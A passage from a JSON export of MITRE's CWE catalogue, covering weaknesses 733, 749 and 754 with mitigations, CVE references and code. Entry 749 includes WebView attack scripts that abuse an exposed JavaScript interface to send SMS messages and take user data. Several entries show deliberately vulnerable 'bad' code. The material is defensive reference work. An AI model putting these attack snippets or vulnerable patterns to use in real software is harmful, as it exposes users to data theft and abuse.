permissions"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"122"}},{"attr":{"@_CAPEC_ID":"127"}},{"attr":{"@_CAPEC_ID":"17"}},{"attr":{"@_CAPEC_ID":"180"}},{"attr":{"@_CAPEC_ID":"206"}},{"attr":{"@_CAPEC_ID":"234"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"61"}},{"attr":{"@_CAPEC_ID":"62"}},{"attr":{"@_CAPEC_ID":"642"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;File Permissions.&#34; Page 495"}},{"attr":{"@_External_Reference_ID":"REF-207","@_Section":"Chapter 8, &#34;Access Control.&#34; Page 194"}},{"attr":{"@_External_Reference_ID":"REF-594"}},{"attr":{"@_External_Reference_ID":"REF-199"}}]},"Notes":{"Note":{"#text":"The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693).","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-08","Submission_Comment":"new weakness-focused entry for Research view."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Likelihood_of_Exploit, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Modes_of_Introduction, Observed_Examples, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Detection_Factors, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Relationships"}],"Previous_Entry_Name":[{"#text":"Insecure Permission Assignment for Resource","attr":{"@_Date":"2009-01-12"}},{"#text":"Insecure Permission Assignment for Critical Resource","attr":{"@_Date":"2009-05-27"}}]}},"733":{"attr":{"@_ID":"733","@_Name":"Compiler Optimization Removal or Modification of Security-critical Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The developer builds a security-critical protection mechanism into the software, but the compiler optimizes the program such that the mechanism is removed or modified.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1038","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}},{"attr":{"@_Class":"Compiled","@_Prevalence":"Undetermined"}}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Black Box","Description":"This specific weakness is impossible to detect using black box methods. While an analyst could examine memory to see that it has not been scrubbed, an analysis of the executable would not be successful. This is because the compiler has already removed the relevant code. Only the source code shows whether the programmer intended to clear the memory or not, so this weakness is indistinguishable from others."},{"Method":"White Box","Description":"This weakness is only detectable using white box methods (see black box detection factor). Careful analysis is required to determine if the code is likely to be removed by the compiler."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-1685","Description":"C compiler optimization, as allowed by specifications, removes code that is used to perform checks to detect integer overflows.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1685"},{"Reference":"CVE-2019-1010006","Description":"Chain: compiler optimization (CWE-733) removes or modifies code used to detect integer overflow (CWE-190), allowing out-of-bounds write (CWE-787).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1010006"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"9"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 9, &#34;A Compiler Optimization Caveat&#34; Page 322"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-10-01","Submission_Comment":"new weakness-focused entry for Research view closes the gap between 14 and 435."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Applicable_Platforms, Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples"}]}},"749":{"attr":{"@_ID":"749","@_Name":"Exposed Dangerous Method or Function","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software provides an Applications Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted.","Extended_Description":{"xhtml:p":["This weakness can lead to a wide variety of resultant weaknesses, depending on the behavior of the exposed method. It can apply to any number of technologies and approaches, such as ActiveX controls, Java functions, IOCTLs, and so on.","The exposure can occur in a few different ways:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["1) The function/method was never intended to be exposed to outside actors.","2) The function/method was only intended to be accessible to a limited set of actors, such as Internet-based access from a single web site."]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability","Access Control","Other"],"Impact":["Gain Privileges or Assume Identity","Read Application Data","Modify Application Data","Execute Unauthorized Code or Commands","Other"],"Note":"Exposing critical functionality essentially provides an attacker with the privilege level of the exposed functionality. This could result in the modification or exposure of sensitive data or possibly even execution of arbitrary code."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"If you must expose a method, make sure to perform input validation on all arguments, limit access to authorized parties, and protect against all possible vulnerabilities."},{"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Identify all exposed functionality. Explicitly list all functionality that must be exposed to some user or set of users. Identify which functionality may be:","Ensure that the implemented code follows these expectations. This includes setting the appropriate access modifiers where applicable (public, private, protected, etc.) or not marking ActiveX controls safe-for-scripting."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["accessible to all users","restricted to a small set of privileged users","prevented from being directly accessible at all"]}}}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following Java example the method removeDatabase will delete the database with the name specified in the input parameter.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void removeDatabase(String databaseName) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (SQLException ex) {...}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Statement stmt = conn.createStatement();stmt.execute(\\"DROP DATABASE \\" + databaseName);","xhtml:br":["",""]}}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"private void removeDatabase(String databaseName) {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (SQLException ex) {...}}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Statement stmt = conn.createStatement();stmt.execute(\\"DROP DATABASE \\" + databaseName);","xhtml:br":["",""]}},"xhtml:br":""}}}}],"Body_Text":"The method in this example is declared public and therefore is exposed to any class in the application. Deleting a database should be considered a critical operation within an application and access to this potentially dangerous method should be restricted. Within Java this can be accomplished simply by declaring the method private thereby exposing it only to the enclosing class as in the following example."},{"attr":{"@_Demonstrative_Example_ID":"DX-109"},"Intro_Text":"These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Overridepublic boolean shouldOverrideUrlLoading(WebView view, String url){}","xhtml:i":"// Android","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (url.substring(0,14).equalsIgnoreCase(\\"examplescheme:\\")){}","xhtml:div":{"#text":"if(url.substring(14,25).equalsIgnoreCase(\\"getUserInfo\\")){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"writeDataToView(view, UserData);return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"return true;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}}},{"attr":{"@_Nature":"bad","@_Language":"Objective-C"},"xhtml:div":{"#text":"-(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType{}","xhtml:i":"// iOS","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSURL *URL = [exRequest URL];if ([[URL scheme] isEqualToString:@\\"exampleScheme\\"]){}return YES;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSString *functionString = [URL resourceSpecifier];if ([functionString hasPrefix:@\\"specialFunction\\"]){}return NO;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"UIWebView *webView = [self writeDataToView:[URL query]];","xhtml:br":["",""],"xhtml:i":"// Make data available back in webview."}}}}}}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":"window.location = examplescheme://method?parameter=value"}],"Body_Text":["A call into native code can then be initiated by passing parameters within the URL:","Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site."]},{"Intro_Text":"This application uses a WebView to display websites, and creates a Javascript interface to a Java object to allow enhanced functionality on a trusted website:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class WebViewGUI extends Activity {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"WebView mainWebView;public void onCreate(Bundle savedInstanceState) {}final class JavaScriptInterface {}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"super.onCreate(savedInstanceState);mainWebView = new WebView(this);mainWebView.getSettings().setJavaScriptEnabled(true);mainWebView.addJavascriptInterface(new JavaScriptInterface(), \\"userInfoObject\\");mainWebView.loadUrl(\\"file:///android_asset/www/index.html\\");setContentView(mainWebView);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"JavaScriptInterface () {}public String getUserInfo() {}","xhtml:br":["",""],"xhtml:div":{"#text":"return currentUser.Info();","attr":{"@_style":"margin-left:10px;"}}}}]}}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":{"#text":"&lt;script&gt;&lt;/script&gt;","xhtml:div":{"#text":"userInfoObject.getClass().forName(\'android.telephony.SmsManager\').getMethod(\'getDefault\',null).sendTextMessage(attackNumber, null, attackMessage, null, null);","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["Before Android 4.2 all methods, including inherited ones, are exposed to Javascript when using addJavascriptInterface(). This means that a malicious website loaded within this WebView can use reflection to acquire a reference to arbitrary Java objects. This will allow the website code to perform any action the parent application is authorized to.","For example, if the application has permission to send text messages:","This malicious script can use the userInfoObject object to load the SmsManager object and send arbitrary text messages to any recipient."]},{"Intro_Text":"After Android 4.2, only methods annotated with @JavascriptInterface are available in JavaScript, protecting usage of getClass() by default, as in this example:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"final class JavaScriptInterface {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"JavaScriptInterface () { }@JavascriptInterfacepublic String getUserInfo() {}","xhtml:br":["","",""],"xhtml:div":{"#text":"return currentUser.Info();","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":{"#text":"&lt;script&gt;&lt;/script&gt;","xhtml:div":{"#text":"var info = window.userInfoObject.getUserInfo();sendUserInfo(info);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}],"Body_Text":["This code is not vulnerable to the above attack, but still may expose user info to malicious pages loaded in the WebView. Even malicious iframes loaded within a trusted page may access the exposed interface:","This malicious code within an iframe is able to access the interface object and steal the user\'s data."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-6382","Description":"arbitrary Java code execution via exposed method","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6382"},{"Reference":"CVE-2007-1112","Description":"security tool ActiveX control allows download or upload of files","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1112"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-503"}},{"attr":{"@_External_Reference_ID":"REF-510"}}]},"Notes":{"Note":{"#text":"Under-reported and under-studied. This weakness could appear in any technology, language, or framework that allows the programmer to provide a functional interface to external parties, but it is not heavily reported. In 2007, CVE began showing a notable increase in reports of exposed method vulnerabilities in ActiveX applications, as well as IOCTL access to OS-level resources. These weaknesses have been documented for Java applications in various secure programming sources, but there are few reports in CVE, which suggests limited awareness in most parts of the vulnerability research community.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-11-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Exposed Insecure Method or Function","attr":{"@_Date":"2009-01-12"}}}},"754":{"attr":{"@_ID":"754","@_Name":"Improper Check for Unusual or Exceptional Conditions","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not check or incorrectly checks for unusual or exceptional conditions that are not expected to occur frequently during day to day operation of the software.","Extended_Description":{"xhtml:p":["The programmer may assume that certain events or conditions will never occur or do not need to be worried about, such as low memory conditions, lack of access to resources due to restrictive permissions, or misbehaving clients or components. However, attackers may intentionally trigger these unusual conditions, thus violating the programmer\'s assumptions, possibly introducing instability, incorrect behavior, or a vulnerability.","Note that this entry is not exclusively about the use of exceptions and exception handling, which are mechanisms for both checking and handling unusual or unexpected conditions."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Many functions will return some value about the success of their actions. This will alert the program whether or not to handle any errors caused by that function."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability"],"Impact":["DoS: Crash, Exit, or Restart","Unexpected State"],"Note":"The data which were produced as a result of a function call could be in a bad state upon return. If the return value is not checked, then this bad data may be used in operations, possibly leading to a crash or other unintended behaviors."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":"Automated static analysis may be useful for detecting unusual conditions involving system resources or common programming idioms, but not for violations of business rules.","Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-12"},"Method":"Manual Dynamic Analysis","Description":"Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application\'s environment, it may still indicate unexpected conditions that were not handled by the application itself."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Choose languages with features such as exception handling that force the programmer to anticipate unusual conditions that may generate exceptions. Custom exceptions may need to be developed to handle unusual business-logic conditions. Be careful not to pass sensitive exceptions back to the user (CWE-209, CWE-248)."]}},{"Phase":"Implementation","Description":"Check the results of all functions that return a value and verify that the value is expected.","Effectiveness":"High","Effectiveness_Notes":"Checking the return value of the function will typically be sufficient, however beware of race conditions (CWE-362) in a concurrent environment."},{"Phase":"Implementation","Description":"If using exception handling, catch and throw specific exceptions instead of overly-general exceptions (CWE-396, CWE-397). Catch and handle exceptions as locally as possible so that exceptions do not propagate too far up the call stack (CWE-705). Avoid unchecked or uncaught exceptions where feasible (CWE-248).","Effectiveness":"High","Effectiveness_Notes":"Using specific exceptions, and ensuring that exceptions are checked, helps programmers to anticipate and appropriately handle many unusual events that could occur."},{"attr":{"@_Mitigation_ID":"MIT-39"},"Phase":"Implementation","Description":{"xhtml:p":["Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.","If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.","Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.","Exposing additional information to a potential attacker in the context of an exceptional condition can help the attacker determine what attack vectors are most likely to succeed beyond DoS."]}},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness_Notes":"Performing extensive input validation does not help with handling unusual conditions, but it will minimize their occurrences and will make it more difficult for attackers to trigger them."},{"attr":{"@_Mitigation_ID":"MIT-38"},"Phase":["Architecture and Design","Implementation"],"Description":"If the program must fail, ensure that it fails gracefully (fails closed). There may be a temptation to simply let the program fail poorly in cases such as low memory conditions, but an attacker may be able to assert control before the software has fully exited. Alternately, an uncontrolled failure could cause cascading problems with other downstream components; for example, the program could send a signal to a downstream process so the process immediately knows that a problem has occurred and has a better chance of recovery."},{"Phase":"Architecture and Design","Description":"Use system limits, which should help to prevent resource exhaustion. However, the software should still handle low resource conditions since they may still occur."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-7"},"Intro_Text":"Consider the following code segment:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char buf[10], cp_buf[10];fgets(buf, 10, stdin);strcpy(cp_buf, buf);","xhtml:br":["",""]}},"Body_Text":"The programmer expects that when fgets() returns, buf will contain a null-terminated string of length 9 or less. But if an I/O error occurs, fgets() will not null-terminate buf. Furthermore, if the end of the file is reached before any characters are read, fgets() returns without writing anything to buf. In both of these situations, fgets() signals that something unusual has happened by returning NULL, but in this code, the warning will not be noticed. The lack of a null terminator in buf can result in a buffer overflow in the subsequent call to strcpy()."},{"attr":{"@_Demonstrative_Example_ID":"DX-8"},"Intro_Text":"The following code does not check to see if memory allocation succeeded before attempting to use the pointer returned by malloc().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"buf = (char*) malloc(req_size);strncpy(buf, xfer, req_size);","xhtml:br":""}},"Body_Text":["The traditional defense of this coding error is: \\"If my program runs out of memory, it will fail. It doesn\'t matter whether I handle the error or simply allow the program to die with a segmentation fault when it tries to dereference the null pointer.\\" This argument ignores three important considerations:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Depending upon the type and size of the application, it may be possible to free memory that is being used elsewhere so that execution can continue."},{"xhtml:div":"It is impossible for the program to perform a graceful exit if required. If the program is performing an atomic operation, it can leave the system in an inconsistent state."},{"xhtml:div":"The programmer has lost the opportunity to record diagnostic information. Did the call to malloc() fail because req_size was too large or because there were too many requests being handled at the same time? Or was it caused by a memory leak that has built up over time? Without handling the error, there is no way to know."}]}}]},{"attr":{"@_Demonstrative_Example_ID":"DX-9"},"Intro_Text":"The following examples read a file into a byte array.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"char[] byteArray = new char[1024];for (IEnumerator i=users.GetEnumerator(); i.MoveNext() ;i.Current()) {}","xhtml:br":"","xhtml:div":{"#text":"String userName = (String) i.Current();String pFileName = PFILE_ROOT + \\"/\\" + userName;StreamReader sr = new StreamReader(pFileName);sr.Read(byteArray,0,1024);//the file is always 1k bytessr.Close();processPFile(userName, byteArray);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"FileInputStream fis;byte[] byteArray = new byte[1024];for (Iterator i=users.iterator(); i.hasNext();) {","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String userName = (String) i.next();String pFileName = PFILE_ROOT + \\"/\\" + userName;FileInputStream fis = new FileInputStream(pFileName);fis.read(byteArray); // the file is always 1k bytesfis.close();processPFile(userName, byteArray);","xhtml:br":["","","","","",""]}}}}],"Body_Text":"The code loops through a set of users, reading a private data file for each user. The programmer assumes that the files are always 1 kilobyte in size and therefore ignores the return value from Read(). If an attacker can create a smaller file, the program will recycle the remainder of the data from the previous user and treat it as though it belongs to the attacker."},{"attr":{"@_Demonstrative_Example_ID":"DX-10"},"Intro_Text":"The following code does not check to see if the string returned by getParameter() is null before calling the member function compareTo(), potentially causing a NULL dereference.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String itemName = request.getParameter(ITEM_NAME);if (itemName.compareTo(IMPORTANT_ITEM) == 0) 